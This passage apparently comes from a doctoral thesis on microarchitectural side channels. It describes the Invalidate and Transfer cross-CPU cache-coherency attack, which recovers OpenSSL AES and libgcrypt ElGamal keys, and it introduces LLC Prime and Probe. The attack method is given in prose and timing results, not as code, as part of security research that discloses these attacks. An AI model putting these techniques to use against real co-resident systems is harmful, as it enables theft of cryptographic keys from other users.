the same CPU socket, even if they are located in different CPU cores. We have
demonstrated that such an attack can be utilized to recover cryptographic keys and
TLS messages from CPU co-resident users. More than that, we demonstrated that
62
Number of messages (L * 28)0 2 4 6 8 10 12 14 16Success detection probability
00.10.20.30.40.50.60.70.80.91
1 hit required
2 hits requiredFigure 4.11: (GnuTLS3.2.0) Success Probability of recovering P14assumingP15
known vs. L, for different number of hits required. Lrefers to the number of 28
traces needed, so the total number of messages would be 28∗L.
Flush and Reload can bypass the isolation techniques implemented by commonly
used hypervisors to avoid cross-VM leakage.
Despite all these advantages, we observed two major hurdles that Flush and
Reload cannot overcome:
•Flush and Reload cannot attack victims located in a different CPU, but it is
restricted to target victims located in the same CPU socket.
•Flush and Reload cannot be applied in systems in which memory deduplication
does not exist, as the attacker does not get access to the victim’s data. This
fact also restricts Flush and Reload to attack only statically allocated data.
In the following chapters we explain how to overcome the two obstacles that
Flush and Reload is not able to bypass.
63
Chapter 5
The First Cross-CPU Attack:
Invalidate and Transfer
In previous sections we have presented Flush and Reload as a cross-core side channel
attack introduced to target Intel processors. However, the utilized covert channels
makes use of specific characteristics that Intel processors feature. For example, the
proposed LLC attack takes advantage of their inclusive cache design. Furthermore,
it also relies on the fact that the LLC is shared across cores. Therefore the Flush
and Reload attack succeeds only when the victim and the attacker are co-located
on the same CPU.
These characteristics are not observed in other CPUs, e.g. AMD or ARM. Aim-
ing at solving these issues, this chapter presents Invalidate and Transfer , an attack
that expands deduplication enabled LLC attacks to victims residing in different
CPU sockets with any LLC characteristics. We utilize AMD as an example, but the
same technique should also succeed in ARM processors. In this sense, AMD servers
present two main complications that prevents application of existing side channel
attacks:
•AMD tends to have more CPU sockets in high end servers compared to Intel.
This reduces the chance of being co-located in the same CPU, and therefore,
to apply the aforementioned Flush and Reload attack.
•LLCs in AMD are usually exclusive ornon-inclusive . The former does not
allocate a memory block in different level caches at the same time. That is,
data is present in only one level of the cache hierarchy. Non-inclusive caches
show neither inclusive or exclusive behavior. This means that any memory
access will fetch the memory block to the upper level caches first. However,
the data can be evicted in the outer or inner caches independently. Hence,
accesses to L1 cache cannot be detected by monitoring the LLC, as it is possible
on Intel machines.
Hence, to perform a side channel attack on AMD processors, both of these challenges
need to be overcome. Here we present a covert channel that is immune to both
64
complications. The proposed Invalidate and Transfer attack is the first side channel
attack that works across CPUs that feature non-inclusive or exclusive caches.
Invalidate and Transfer presents a new covert channel based on cache coherency
technologies implemented in modern processors. In particular, we focus on AMD
processors, which have exclusive caches that in principle are invulnerable to cache
side channel attacks although the results can be readily applied to multi-CPU Intel
processors as well. In summary,
•We present the first cross-CPU side channel attack, showing that CPU co-
location is not needed in multi-CPU servers to obtain fine grain information.
•We present a new deduplication-based covert channel that utilizes directory-
based cache coherency protocols to extract sensitive information.
•We show that the new covert channel succeeds in those processors where cache
attacks have not been shown to be possible before, e.g. AMD exclusive caches.
•We demonstrate the feasibility of our new side channel technique by mounting
an attack on a T-table based AES and a square and multiply implementation
of El Gamal schemes.
5.1 Cache Coherence Protocols
In order to ensure coherence between different copies of the same data, systems
implement cache coherence protocols. In the multiprocessor setting, the coherency
between shared blocks that are cached in different processors (and therefore in dif-
ferent caches) also needs to be maintained. The system has to ensure that each
processor accesses the most recent value of a shared block, regardless of where that
memory block is cached. The two main categories of cache coherence protocols
aresnooping based protocols and directory based protocols . While snooping based
protocols follow a decentralized approach, they usually require a centralized data
bus that connects all caches. This results in excessive bandwidth need for systems
with an increasing number of cores. Directory-based protocols, however, enable
point-to-point connections between cores and directories, hence follow an approach
that scales much better with an increasing number of cores in the system. We put
our focus in the latter one, since it is the prevailing choice in current multiproces-
sor systems. The directory keeps track of the state of each of the cached memory
blocks. Thus, upon a memory block access request, the directory will decide the
state that the memory block has to be turned into, both in the requesting node
and the sharing nodes that have a cached copy of the requested memory block. We
analyze the simplest cache coherence protocol, with only 3 states, since the attack
that is implemented in this study relies on read-only data. Thus, the additional
states applied in more complicated coherency protocols do not affect the flow of our
attack.
65
We introduce the terms home node for the node where the memory block resides,
local node for the node requesting access to the memory block, and owner node
referring a node that has a valid copy of the memory block cached. This leads to
various communication messages that are summarized as follows:
•The memory block cached in one or more nodes can be in either uncached
state, exclusive/modified orshared .
•Upon a read hit, the local node’s cache services the data. In this case, the
memory block maintains its state.
•Upon a read miss, the local node contacts the home node to retrieve the
memory block. The directory knows the state of the memory block in other
nodes, so its state will be changed accordingly. If the block is in exclusive
state, it goes to shared . If the block is in shared state, it maintains it. In
both cases the local node then becomes an owner and holds a copy of the
shared memory block.
•Upon a write hit, the local node sets the memory block to exclusive. The
local node communicates the nodes that have a cached copy of the memory
block to invalidate or to update it.
•Upon a write miss, again the home node will service the memory block. The
directory knows the nodes that have a cached copy of the memory block, and
therefore sends them either an update or an invalidate message. The local
node then becomes an owner of the exclusive memory block.
In practice, most cache coherency protocols have additional states that the mem-
ory block can acquire. The most studied one is the MESI protocol, where the
exclusive state is divided into the exclusive and modified states. Indeed, a
memory block is exclusive when a single node has a clean state of the memory
block cached. However, when a cached memory block is modified, it acquires the
modified state since it is not consistent with the value stored in the memory. A
write back operation would set the memory block back to the exclusive state.
The protocols implemented in modern processors are variants of the MESI pro-
tocol, mainly adding additional states. For instance, the Intel i7 processor uses
a MESIF protocol, which adds the additional forward state. This state will des-
ignate the sharing processor that should reply to a request of a shared memory
block, without involving a memory access operation. The AMD Opteron utilizes
the MOESI protocol with the additional owned state. This state indicates that
the memory block is owned by the corresponding cache and is out-of-date with the
memory value. However, contrary to the MESI protocol where a transition from
modified toshared involves a write back operation, the node holding the owned
state memory block can service it to the sharing nodes without writing it back to
memory. Note that both the MESIF and MOESI protocol involve a cache memory
66
block forwarding operation. Both the owned and the forward state suggest that a
cache rather than a DRAM will satisfy the reading request. If the access time from
cache differs from regular DRAM access times, this behavior becomes an exploitable
covert channel.
5.1.1 AMD HyperTransport Technology
Cache coherency plays a key role in multi-core servers where a memory block might
reside in many core-private caches in the same state or in a modified state. In mul-
tiple socket servers, this coherency does not only have to be maintained within a
processor, but also across CPUs. Thus, complex technologies are implemented to
ensure the coherency in the system. These technologies center around the cache
directory protocols explained in section 5.1. The HyperTransport technology imple-
mented by AMD processors serves as a good example. We only focus on the features
relevant to the new proposed covert channel. A detailed explanation can be found
in [CKD+10, AMD].
The HyperTransport technology reserves a portion of the LLC to act as directory
cache in the directory based protocol. This directory cache keeps track of the cached
memory blocks present in the system. Once the directory is full, one of the previous
entries will be replaced to make room for a new cached memory block. The directory
always knows the state of any cached memory block, i.e., if a cache line exists in
any of the caches, it must also have an entry in the directory. Any memory request
will go first through the home node’s directory. The directory knows the processors
that have the requested memory block cached, if any. The home node initiates
in parallel both a DRAM access and a probe filter . The probe filter is the action
of checking in the directory which processor has a copy of the requested memory
block. If any node holds a cached copy of the memory block, a directed probe
against it is initiated, i.e., the memory block will directly be fast forwarded from
the cached data to the requesting processor. A directed probe message does not
trigger a DRAM access. Instead, communications between nodes are facilitated via
HyperTransport links, which can run as fast as 3 GHz. Figure 5.1 shows a diagram
of how the HyperTransport links directly connect the different CPUs to each other
avoiding memory node accesses. Although many execution patterns can arise from
this protocol, we will only explain those relevant to the attack, i.e. events triggered
over read-only blocks which we will elaborate on later. We assume that we have
processors A and B, refereed to as PaandPb, that share a memory block:
•IfPaandPbhave the same memory block cached, upon a modification made
byPa,HyperTransport will notify PbthatPahas the latest version of the
memory block. Thus, Pawill have to update its version of the block to con-
vert the shared block into a owned block. Upon a new request made by Pb,
HyperTransport will transfer the updated memory block cached in Pa.
67
Figure 5.1: DRAM accesses vs Directed probes thanks to the HyperTransport Links
•Similarly, upon a cache miss in Pa, the home node will send a probe message
to the processors that have a copy of the same shared memory block, if any.
If, for instance, Pbhas it, a directed probe message is initiated so that the
node can service the cached data through the hypertransport links. Therefore,
HyperTransport reduces the latency of retrieving a memory block from the
DRAM by also checking whether someone else maintains a cached copy of
the same memory block. Note that this process does not involve a write-back
operation.
•When a new entry has to be placed in the directory of Pa, and the directory
is full, one of the previously allocated entries has to be evicted to make room
for the new entry. This is referred as a downgrade probe . In this case, if the
cache line is dirty a writeback is forced, and an invalidate message is sent to
all the processors ( Pb) that maintain a cached copy of the same memory block.
In short, HyperTransport reduces latencies that were observed in previously im-
plemented cache coherency protocols by issuing directed probes to the nodes that
have a copy of the requested memory block cached. The HyperTransport links ensure
a fast transfer to the requesting node. In fact, the introduction of HyperTransport
links greatly improved the performance and thus viability of multi-CPU systems.
Earlier multi-CPU systems relied on broadcast or directory protocols, where a re-
quest of a exclusive cached memory block in an adjacent processor would imply a
writeback operation to retrieve the up-to-date memory block from the DRAM.
5.1.2 Intel QuickPath Interconnect Technology
In order to maintain cache coherency across multiple CPUs Intel implements a
similar technique to AMD’s HyperTransport called Intel QuickPath Interconnect
(QPI) [Intd, IQP]. Indeed, the later one was designed five years latter than the
first one to compete with the existing technology in AMD processors. Similar to
HyperTransport , QPI connects one or more processors through high speed point-to-
point links as fast as 3.2GHz. Each processor has a memory controller on the same
68
DRAM DRAMBlock A 1Block ACPU 0 CPU 1
Directory Directory
Block A1
2  (a) HTLink: fast access
DRAM DRAMCPU 0 CPU 1
Directory Directory
Block AFAST
SLOW1
4
2 3 (b) DRAM: slow access
Figure 5.2: Comparison of a directed probe access across processors: probe satisfied
from CPU 1’s cache directly via HTLink (a) vs. probe satisfied by CPU 1 via a slow
DRAM access (b).
die to make to improve the performance. As we have already seen with AMD, among
other advantages, this interface efficiently manages the cache coherence in the system
in multiple processor servers by transferring shared memory blocks through the QPI
high speed links. In consequence, the proposed mechanisms that we later explain in
this paper are also applicable in servers featuring multi-CPU Intel processors.
5.2 Invalidate and Transfer Attack Procedure
We propose a new spy process that takes advantage of leakages observed in the cache
coherency protocol with memory blocks shared between many processors/cores. The
spy process does not rely on specific characteristics of the cache hierarchy, like
inclusiveness. In fact, the spy process works even across co-resident CPUs that do
not share the same cache hierarchy. From now on, we assume that the victim and
attacker share the same memory block and that they are located in different CPUs
or in different cache hierarchies in the same server.
The spy process is executed in three main steps, which are:
•Invalidate step: In this step, the attacker invalidates a memory block that is
in his own cache hierarchy. If the invalidation is performed in a shared memory
block cached in another cache processors cache hierarchy, the HyperTransport
will send an invalidate message to them. Therefore, after the invalidation
step, the memory block will be invalidated in all the caches that have the
same memory block, and this will be uncached from them. This invalidation
can be achieved by specialized instructions like clflush if they are supported
by the targeted processors, or by priming the set where the memory block
resides in the cache directory.
•Wait step: In this step, the attacker waits for a certain period of time to
69
Hardware cycles100 150 200 250 300 350Probability
00.10.20.30.40.50.60.7
DRAM access
Direct transfer accessFigure 5.3: Timing distribution of a memory block request to the DRAM (red)
vs a block request to a co-resident processor(blue) in a AMD opteron 6168. The
measurements are taken from different CPUs. Outliers above 400 cycles have been
removed
let the victim do some computation. The victim might or might not use the
invalidated memory block in this step.
•Transfer step: In the last step, the attacker requests access to the shared
memory block that was invalidated. If any processor in the system has cached
this memory block, the entry in the directory would have been updated and
therefore a direct probe request will be sent to the processor. If the memory
block was not been used, the home directory will request a DRAM access to
the memory block.
The system experiences a lower latency when a direct probe is issued, mainly
because the memory block is issued from another processors cache hierarchy. This
is graphically observed in Figure 5.2. Figure 5.2(a) shows a request serviced by
theHyperTransport link from a CPU that has the same memory block cached.
In contrast, Figure 5.2(b) represents a request serviced by a DRAM access. This
introduces a new leakage if the attacker is able to measure and distinguish the time
that both actions take. This is the covert channel that will be exploited in this work.
We use the RDTSC function which accesses the time stamp counter to measure the
request time. In case the RDTSC function is not available from user mode, one can also
create a parallel thread incrementing a shared variable that acts as a counter. We
also utilize the mfence instruction to ensure that all memory load/store operations
have finished before reading the time stamp counter.
The timing distributions of both the DRAM access and the directed transfer
access are shown in Figure 5.3, where 10,000 points of each distribution were taken
70
Hardware cycles250 300 350 400 450 500 550 600 650Probability
00.10.20.30.40.50.60.7
DRAM access
Direct transfer accessFigure 5.4: Timing distribution of a memory block request to the DRAM (red)
vs a block request to a co-resident core(blue) in a dual core Intel E5-2609. The
measurements are taken from the same CPU. Outliers above 700 cycles have been
removed
across CPUs in a 48-core 4 CPU AMD Opteron 6168. The x-axis represents the
hardware cycles, while the y-axis represents the density function. The measure-
ments are taken across processors. The blue distribution represents a directed
probe access, i.e., a co-resident CPU has the memory block cached, whereas the
red distribution represents a DRAM access, i.e., the memory block is not cached
anywhere. It can be observed that the distributions differ in about 50 cycles, fine
grain enough to be able to distinguish them. However, the variance in both distri-
butions is very similar, in contrast to LLC covert channels. Nevertheless, we obtain
a covert channel that works across CPUs and that does not rely on the inclusiveness
property of the cache.
We also tested the viability of the covert channel in a dual socket Intel Xeon
E5-2609. Intel utilizes a similar technique to the HyperTransport technology called
Intel Quick Path Interconnect . The results for the Intel processor are shown in
Figure 5.4, again with processes running in different CPUs. It can be observed that
the distributions are even more distinguishable in this case.
5.3 Exploiting the New Covert Channel
In the previous section, we presented the viability of the covert channel. Here
we demonstrate how one might exploit the covert channel to extract fine grain
information. More concretely, we present two attacks:
71
•a symmetric cryptography algorithm, i.e. table based OpenSSL implementation
of AES, and
•a public key algorithm, i.e. a square-and-multiply based libgcrypt imple-
mentation of the El Gamal scheme.
5.3.1 Attacking Table Based AES
We test the granularity of the new covert channel by mounting an attack in a
software implementation of AES, as in 4.4.We again use the C OpenSSL reference
implementation, which uses 4 different T-tables along 10 rounds for AES-128.
To recap, we monitor a memory block belonging to each one of the T-tables. Each
memory block contains 16 T-Table positions and it has a certain probability, 8% in
our particular case, of not being used in any of the 10 rounds of an encryption. Thus,
applying our Invalidate and Transfer attack and recording the ciphertext output, we
can know when the monitored memory block has not been used. For this purpose
weinvalidate the memory block before the encryption and try to probe it after the
encryption. In a noise free scenario, the monitored memory block will not be used for
240 ciphertext outputs with 8% probability, and it will not be used for the remaining
16 ciphertext with 0% probability (because they directly map through the key to
the monitored T-table memory block). Although microarchitectural attacks suffer
from different microarchitectural sources of noise, we expect that the Invalidate and
Transfer can still distinguish both distributions.
Once we know the ciphertext values belonging to both distributions, we can
apply the equation:
Ki=T[Sj]⊕Ci
to recover the key. Since the last round of AES involves only a Table look up and
a XOR operation, knowing the ciphertext and the T-table block position used is
enough to obtain the key byte candidate that was used during the last AES round.
Since a cache line holds 16 T-table values, we XOR each of the obtained ciphertext
values with all the 16 possible T-table values that they could map to. Clearly, the
key candidate will be a common factor in the computations with the exception of
the observed noise which is eliminated via averaging. As the AES key schedule is
revertible, knowing one of the round keys is equivalent to knowing the full encryption
key.
5.3.2 Attacking Square and Multiply El Gamal Decryption
We test the viability of the new side channel technique with an attack on a square
and multiply libgcrypt implementation of the public key ElGamal algorithm, as
in [ZJRR12]. An ElGamal encryption involves a cyclic group of order pand a
generatorgof that cyclic group. Then Alice chooses a number a∈Z∗
pand computes
her public key as the 3-tuple ( p,g,ga) and keeps aas her secret key.
72
To encrypt a message m, Bob first chooses a number b∈Z∗
pand calculates
y1=gbandy2= ((ga)b)∗mand sends both to Alice. In order to decrypt the
message, Alice utilizes her secret key ato compute (( y1)−a)∗y2. Note that, if a
malicious user recovers the secret key ahe can decrypt any message sent to Alice.
Our target will be the y−a
1that uses the square and multiply technique as the
modular exponentiation method. It bases its procedure in two operations: a square
operation followed by a modulo reduction and a multiplication operation followed by
a modulo reduction. The algorithm starts with the intermediate state R=bbeingb
the base that is going to be powered, and then examines the secret exponent afrom
the most significant to the least significant bit. If the bit is a 0, the intermediate
state is squared and reduced with the modulus. If in the contrary the exponent bit
is a 1, the intermediate state is first squared, then it is multiplied with the base
band then reduced with the modulus. Algorithm 2, presented in the background
section and shown below, shows the entire procedure.
Algorithm 6 Square and Multiply Exponentiation
Input : baseb, modulusN, secretE= (ek−1,...,e 1,e0)
Output :bEmodN
R=b;
fori=k−1downto 0do
R=R2modN;
ifei==1 then
R=R∗bmodN;
end
end
returnR;
As it can be observed the algorithm does not implement a constant execution
flow, i.e., the functions that will be used directly depend on the bit exponent. If
the square and multiply pattern is known, the complete key can be easily computed
by converting them into ones and zeros. Indeed, our Invalidate and Transfer spy
process can recover this information, since functions are stored as shared memory
blocks in cryptographic libraries. Thus, we mount an attack with the Invalidate and
Transfer to monitor when the square and multiplication functions are utilized.
5.4 Experiment Setup and Results
In this section we present the test setup in which we implemented and executed the
Invalidate and Transfer spy process together with the results obtained for the AES
and ElGamal attacks.
73
5.4.1 Experiment Setup
In order to prove the viability of our attack, we performed our experiments on a 48-
core machine featuring four 12-core AMD Opteron 6168 CPUs. This is an university
server which has not been isolated for our experiments, i.e., other users are utilizing
it at the same time. Thus, the environment is a realistic scenario in which non
desired applications are running concurrently with our attack.
The machine runs at 1.9GHz, featuring 3.2GHz HyperTransport links. The
server has 4 AMD Opteron 6168 CPUs, with 12 cores each. Each core features
a private 64KB 2-way L1 data cache, a private 64KB L1 instruction cache and a
16-way 512KB L2 cache. Two 6MB 96-way associative L3 caches—each one shared
across 6 cores—complete the cache hierarchy. The L1 and L2 caches are core-private
resources, whereas the L3 cache is shared between 6 cores. Both the L2 and L3 caches
are non-inclusive, i.e., data can be allocated in anycache level at a time. This is
different to the inclusive LLC where most of the cache spy processes in literature
have been executed.
The attacks were implemented in a RedHat enterprise server running the linux
2.6.23 kernel. The attacks do not require root access to succeed, in fact, we did not
have sudo rights on this server. Since ASLR was enabled, the targeted functions
addresses were retrieved by calculating the offset with respect to the starting point
of the library. All the experiments were performed across CPUs, i.e., attacker and
victim do not reside in the same CPU and do not share any LLC. To ensure this,
we utilized the taskset command to assign the CPU affinity to our processes.
Our targets were the AES C reference implementation of OpenSSL and the El-
Gamal square and multiply implementation of libgcrypt 1.5.2. The libraries are
compiled as shared, i.e., all users in the OS will use the same shared symbols
(through KSM mechanism). In the case of AES we assume we are synchronized
with the AES server, i.e., the attacker sends plaintext and receives the correspond-
ing ciphertexts. As for the ElGamal case, we assume we are not synchronized with
the server. Instead, the attacker process simply monitors the function until valid
patterns are observed, which are then used for key extraction.
5.4.2 AES Results
As explained in Section 5.3, in order to recover the full key we need to target a
single memory block from the four T-tables. However, in the case that a T-table
memory block starts in the middle of a cache line, monitoring only 2 memory blocks
is enough to recover the full key. In fact, there exists a memory block that contains
both the last 8 values of T0 and the first 8 values of T1. Similarly there exists a
memory block that contains the last 8 values of T2 and the first 8 values of T3.
Unlike in section 4.4, we make use of this fact and only monitor those two memory
blocks to recover the entire AES key.
We store both the transfer timing and the ciphertext obtained by our encryption
74
Ciphertext value0 50 100 150 200 250Miss counter value normalized with maximum
00.10.20.30.40.50.60.70.80.91Figure 5.5: Miss counter values for each ciphertext value, normalized to the average
server. In order to analyze the results, we implement a miss counter approach: we
count the number of times that each ciphertext value sees a miss, i.e. that the
monitored cache line was not loaded for that ciphertext value. An example of one
of the runs for ciphertext number 0 is shown in Figure 5.5. The 8 ciphertext values
that obtain the lowest scores are the ones corresponding to the cache line, thereby
revealing the key value.
In order to obtain the key, we iterate over all possible key byte values and
compute the last round of AES only for the monitored T-table values, and then
group the miss counter values of the resulting ciphertexts in one set. We group in
another set the miss counter of the remaining 248 ciphertext values. Clearly, for
the correct key, the distance between the two sets will be maximum. An example
of the output of this step is shown in Figure 5.6, where the y-axis represents the
miss counter ratio (i.e., ratio of the miss counter value in both sets) and the x-axis
represents the key byte guess value. It can be observed that the ratio of the correct
key byte (180) is much higher than the ratio of the other guesses.
Finally, we calculate the number of encryptions needed to recover the full AES
key. This is shown in Figure 5.7, where the y-axis again represents the ratios and
thex-axis represents the number of encryptions. As it can be observed, the correct
key is not distinguishable before 10,000 traces, but from 20,000 observations, the
correct key is clearly distinguishable from the rest. We conclude that the new
method succeeds in recovering the correct key from 20,000 encryptions.
75
Key Guess0 50 100 150 200 250 300Miss Counter Ratio
00.010.020.030.040.050.06
X: 180
Y: 0.05315Figure 5.6: Correct key byte finding step, iterating over all possible keys. The
maximum distance is observed for the correct key
10310410500.020.040.060.080.10.12
Number of encryptionsDifference of Ratios
Figure 5.7: Difference of Ratios over the number of encryptions needed to recover
the full AES key. The correct key (bold red line) is clearly distinguishable from
20,000 encryptions.
5.4.3 El Gamal Results
Next we present the results obtained when the attack aims at recovering an ElGamal
decryption key. We target a 2048 bit ElGamal key. Remember that, unlike in the
76
Timeslot ×1040.4 0.6 0.8 1 1.2 1.4 1.6 1.8Square funcion usage00.51
Decrypt Idle Decrypt Idle Decrypt Idle DecryptFigure 5.8: Trace observed by the Invalidate and Transfer , where 4 decryption
operations are monitored. The decryption stages are clearly visible when the square
function usage gets the 0 value
case of AES, this attack does not need synchronization with the server, i.e., the server
runs continuous decryptions while the attacker continuously monitors the vulnerable
function. Since the modular exponentiation creates a very specific pattern with
respect to both the square and multiply functions, we can easily know when the
exponentiation occurred in the time. We only monitor a single function, i.e., the
square function. In order to avoid speculative execution, we do not monitor the
main function address but the following one. This is sufficient to correctly recover
a very high percentage of the ElGamal decryption key bits. For our experiments,
we take the time that the invalidate operation takes into account, and a minimum
waiting period of 500 cycles between the invalidate and the transfer operation is
sufficient to recover the key patterns. Figure 5.8 presents a trace where 4 different
decryptions are caught. A 0 in the y-axis means that the square function is being
utilized, while a 1 the square function is not utilized, while the x-axis represents
the time slot number. The decryption stages are clearly observable when the square
function gets a 0 value.
Recall that the execution flow caused by a 0 bit in the exponent is square+reduct
ion, while the pattern caused by a 1 bit in the exponent is square+reduction+multi
ply+reduction . Since we only monitor the square operation, we reconstruct the
patterns by checking the distance between two square operations. Clearly, the dis-
tance between the two square operations in a 00 trace will be smaller than the
distance between the two square operations in a 10 trace, since the latter one takes
an additional multiplication function. With our waiting period threshold, we ob-
serve that the distance between two square operations without the multiplication
function varies from 2 to 4 Invalidate and Transfer steps, while the distance be-
tween two square operations varies from 6 to 8 Invalidate and Transfer steps. If
the distance between two square operations is lower than 2, we consider it part of
the same square operation. An example of such a trace is shown in Figure 5.9. In
the figure,Srefers to a square operation, Rrefers to a modulo reduction operation
77
Time slot0 5 10 15 20 25Square function utilized00.51
S   R M R SRS   R M R SRFigure 5.9: Trace observed by the Invalidate and Transfer , converted into square
and multiply functions. The y-axis shows a 0 when the square function is used and
a 1 when the square function is not used
Table 5.1: Summary of error results in the RSA key recovery attack
Traces analysed 20
Maximum error observed 3.47%
Minimum error observed 1.9%
Average error 2.58%
Traces needed to recover full key 5
andMrefers to a multiply operation. The x-axis represents the time slot, while
the y axis represents whether the square function was utilized. The 0 value means
that the square function was utilized, whereas the 1 value means that the square
function was not utilized. The pattern obtained is SRMRSRSRMRSR , which can
be translated into the key bit string 1010.
However, due to microarchitectural sources of noise (context switches, interrupts,
etc.) the recovered key has still some errors. In order to evaluate the error percentage
obtained, we compare the obtained bit string with the real key. Any insertion,
removal or wrong guessed bit is considered a single error. Table 5.1 summarizes
the results. We evaluate 20 different key traces obtained with the Invalidate and
Transfer spy process. On average, they key patterns have an error percentage of
2.58%. The minimum observed error percentage was 1.9% and the maximum was
3.47%. Thus, since the errors are very likely to occur at different points in order to
decide the correct pattern we analyse more than one trace. On average, 5 traces are
needed to recover the key correctly.
78
5.5 Invalidate and Transfer Outcomes
We presented the Invalidate and Transfer attack, capable of recovering, for the first
time, information across CPU sockets in systems that provide memory deduplica-
tion. The new attack utilizes the cache coherency protocol as a covert channel and
its effectiveness was proved by recovering both AES and RSA keys. Further, the
attack is inclusiveness property agnostic. On the downsides, the attack still requires
attacker and victim to share memory, and thus, is only applicable in VMMs with
memory deduplication or smartphones. In response, the next chapter introduces
an attack that is not reliant upon the memory deduplication feature, and thus is
applicable in virtually every system in which attacker and victim processes can
co-reside.
79
Chapter 6
ThePrime and Probe Attack
In previous chapters, we presented two side channel attacks that used hardware
cache properties to retrieve information across cores/CPUs. However, both attacks
worked under the assumption of shared memory between attacker and victim, which
was achievable through mechanisms like KSM. Although we demonstrated to recover
fine grain information with them, due to the shared memory requirement, we observe
the following challenges associated to them:
•Some real world scenarios might not implement memory deduplication fea-
tures. For instance, some commercial clouds have cross-VM memory dedu-
plication disabled, as it is the case for Amazon EC2. Furthermore, memory
page sharing is not allowed between trusted and untrusted worlds in Trusted
Execution Environments (TEEs).
•Flush and Reload and Invalidate and Transfer , since they rely on memory
sharing, cannot get information dynamically allocated memory, as every user
gets its own copy of it. This limits the applicability of both attacks.
These two inconveniences restrict the applicability of Flush and Reload and In-
validate and Transfer . Thus, it is necessary to know whether an attacker can bypass
these obstacles and still gain information about a victim’s activity across cores. This
chapter explains a new approach to utilize the Last Level Cache (LLC) as a covert
channel without relying on memory deduplication features. In particular, we take
the already known Prime and Probe attack and make it successful on the LLC. This
is not a straightforward process, as it still requires to solve some technical issues
when targeting the LLC.
6.1 Virtual Address Translation and Cache Ad-
dressing
In this chapter we present an attack that takes advantage of some known information
in the virtual to physical address mapping process. Thus, we give a brief overview
80
about the procedure followed by modern processors to access and address data in
the cache [HP11].
In modern computing, processes use virtual memory to access the different re-
quested memory locations. Indeed processes do not have direct access to the physical
memory, but use virtual addresses that are then mapped to physical addresses by the
Memory Management Unit (MMU). This virtual address space is managed bv the
Operating System. The main benefits of virtual memory are security (processes are
isolated from real memory ) and the usage of more memory than physically available
due to paging techniques.
The memory is divided into fixed length continuous blocks called memory pages.
The virtual memory allows the usage of these memory pages even when they are not
allocated in the main memory. When a specific process needs a page not present
in the main memory, a page fault occurs and the page has to be loaded from the
auxiliary disk storage. Therefore, a translation stage is needed to map virtual ad-
dresses to physical addresses prior to the memory access. In fact, cloud systems
have two translation processes, i.e, guest OS to VMM virtual address and VMM
virtual address to physical address. The first translation is handled by shadow page
tables while the second one is handled by the MMU. This adds an abstraction layer
with the physical memory that is handled by the VMM.
During translation, the virtual address is split into two fields: the offset field
and the page field. The length of both fields depends directly on the page size .
Indeed, if the page size is pbytes, the lower log2(p) bits of the virtual address will
be considered as the page offset , while the rest will be considered as the page frame
number (PFN). Only the PFN is processed by the MMU and needs to be translated
from virtual to physical page number. The page offset remains untouched and will
have the same value for both the physical and virtual address. Thus, the user still
knows some bits of the physical address. Modern processors usually work with 4 KB
pages and 48 bit virtual addresses, yielding a 12 bit offset and the remaining bits as
virtual page number.
In order to avoid the latency of virtual to physical address translation, modern
architectures include a Translation Lookaside Buffer (TLB) that holds the most re-
cently translated addresses. The TLB acts like a small cache that is first checked
prior to the MMU. One way to avoid TLB misses for large data processes is to in-
crease the page size so that the memory is divided in less pages [CJ06, Inte, WW09].
Since the possible virtual to physical translation tags have been significantly reduced,
the CPU will observe less TLB misses than with 4 KB pages. This is the reason
why most modern processors include the possibility to use huge size pages, which
typically have a size of at least 1 MB. This feature is particularly effective in vir-
tualized settings, where virtual machines are typically rented to avoid the intensive
hardware resource consumption in the customers private computers. In fact, most
well known VMMs support the usage of huge size pages by guest OSs to improve
the performance of those heavy load processes [VMwc, KVM, Xenb].
81
Cache Addressing: Caches are physically tagged, i.e, the physical address is used
to decide the position that the data is going to occupy in the cache. With bbytes
size cache lines and m-way set associative caches (with nnumber of sets), the lower
log2(b) bits of the physical address are used to index the byte in a cache line, while
the following log2(n) bits select the set that the memory line is mapped to in the
cache. A graphical example of the procedure carried out to address the data in the
cache can be seen in Figure 6.2. Recall that if a page size of 4 KB is used, the offset
field is 12 bits long. If log2(n) + log2(b) is not bigger than 12, the set that a cache
line is going to occupy can be addressed by the offset. In this case we say that
the cache is virtually addressed, since the position occupied by a cache line can be
determined by the virtual address. In contrast, if more than 12 bits are needed to
address the corresponding set, we say that the cache is physically addressed, since
only the physical address can determine the location of a cache line. Note that
when huge size pages are used, the offset field is longer, and therefore bigger caches
can be virtually addressed. As we will see, this information can be used to mount
a cross-VM attack in the L3 cache in deduplication free systems. Note that, this
information was not necessary with Flush and Reload and Invalidate and Transfer
as we assumed that we shared ownership of the attacked memory blocks with the
victim.
6.2 Last Level Cache Slices
Recent SMP microarchitecures divide the LLC into slices with the purpose of re-
ducing the bandwidth bottlenecks when more than one core attempts to retrieve
data from the LLC at the same time. The number of slices that the LLC is divided
into usually matches the number of physical cores. For instance, a processor with
scores divides the LLC into sslices, decreasing the probability of resource conflict
while accessing it. However, each core is still able to access the whole LLC, i.e., each
core can access every slice. Since the data will be spread into s“smaller caches” it
is less likely that two cores will try to access the same slice at the same time. In
fact, if each slice can support one access per cycle, the LLC does not introduce a
bottleneck on the data throughput with respect to the processors as long as each
processor issues no more than one access per cycle. The slice that a memory block
is going to occupy directly depends on its own physical address and a non-public
hash function, as in Figure 6.1.
Performance optimization of sliced caches has received a lot of attention in the
past few years. In 2006, Cho et al. [CJ06] analyzed a distributed management ap-
proach for sliced L2 caches through OS page allocation. In 2007, Zhao et al. [ZIUN08]
described a design for LLC where part of the slice allocates core-private data. Cho
et al [JC07] describe a two-dimensional page coloring method to improve access
latencies and miss rates in sliced caches. Similarly, Tam et al. [TASS07] also pro-
posed an OS based method for partitioning the cache to avoid cache contention.
82
010110111011..
Figure 6.1: A hash function based on the physical address decides whether the
memory block belongs to slice 0 or 1.
In 2010 Hardavellas et al. [HFFA10] proposed an optimized cache block placement
for caches divided into slices. Srikantaiah et al. [SKZ+11] presented a new adaptive
multilevel cache hierarchy utilizing cache slices for L2 and L3 caches. In 2013 Chen
et al. [CCC+13] detail on the approach that Intel is planning to take for their next
generation processors. The paper shows that the slices will be workload dependent
and that some of them might be dynamically switched off for power saving. In
2014 Kurian et al. [KDK14b] proposed a data replication protocol in the LLC slices.
Ye et al. [YWCL14] studied a cache partitioning system treating each slice as an
independent smaller cache.
However, only very little effort has been put into analyzing the slice selection
hash function used for selecting the LLC slice. A detailed analysis of the cache per-
formance in Nehalem processors is described in [MHSM09] without an explanation
of cache slices. The LLC slices and interconnections in a Sandy Bridge microar-
chitecture are discussed in [Bri], but the slice selection algorithm is not provided.
In [hen], a cache analysis of the Intel Ivy Bridge architecture is presented and cache
slices are mentioned. However, the hash function describing the slice selection algo-
